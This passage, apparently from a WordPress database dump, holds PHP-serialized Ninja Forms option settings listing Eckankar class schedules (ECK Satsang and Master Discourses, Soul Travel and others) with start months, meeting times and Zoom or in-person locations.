Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:5;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:82:\"Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:81:\"Letters of Light and Sound 2 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:5;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:84:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 4:00-5:30 pm - Florence-Hybrid\";s:5:\"value\";s:82:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Saturday at 400-530 pm - Florence-Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:9;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:73:\"The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 7:00-8:30 pm - Zoom\";s:5:\"value\";s:71:\"The Secret Way - STARTS IN NOVEMBER -- 2nd Tuesday at 700-830 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:87:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 9:00 – 10:15 am - Zoom\";s:5:\"value\";s:82:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:106:\"The ECK Satsang Discourses – First Series - STARTS IN NOVEMBER -- 1st Sunday at 12:00 – 1:30 pm - Zoom\";s:5:\"value\";s:98:\"The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:12;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:109:\"The ECK Satsang Discourses – First Series - STARTS IN NOVEMBER -- 1st Sunday at 11:45 am – 1:00 pm - Zoom\";s:5:\"value\";s:101:\"The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:98:\"The ECK Satsang Discourses – Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:94:\"The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 1st Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:14;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:100:\"The ECK Satsang Discourses – Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 7:00 pm - Zoom\";s:5:\"value\";s:96:\"The ECK Satsang Discourses  Second Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:16;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:97:\"The ECK Satsang Discourses – Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 7:00 pm - Zoom\";s:5:\"value\";s:93:\"The ECK Satsang Discourses  Fourth Series - STARTS IN NOVEMBER -- 1st Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:13;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:76:\"The Master 1 Discourses - STARTS IN DECEMBER -- 2nd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:75:\"The Master 1 Discourses - STARTS IN DECEMBER -- 2nd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:14;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:18;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:79:\"The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 7:30 pm - Zoom\";s:5:\"value\";s:78:\"The Master 2 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:15;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:20;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:95:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 8:45 – 10:00 am - Temple-Hybrid\";s:5:\"value\";s:90:\"The Master 4 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - Temple-Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}','options','a:16:{i:0;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:0;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:77:\"The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:76:\"The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:1;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:1;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:80:\"The ECK Dream 1 Discourses - STARTS IN JANUARY -- 1st Thursday at 7:00 pm - Zoom\";s:5:\"value\";s:79:\"The ECK Dream 1 Discourses - STARTS IN JANUARY -- 1st Thursday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 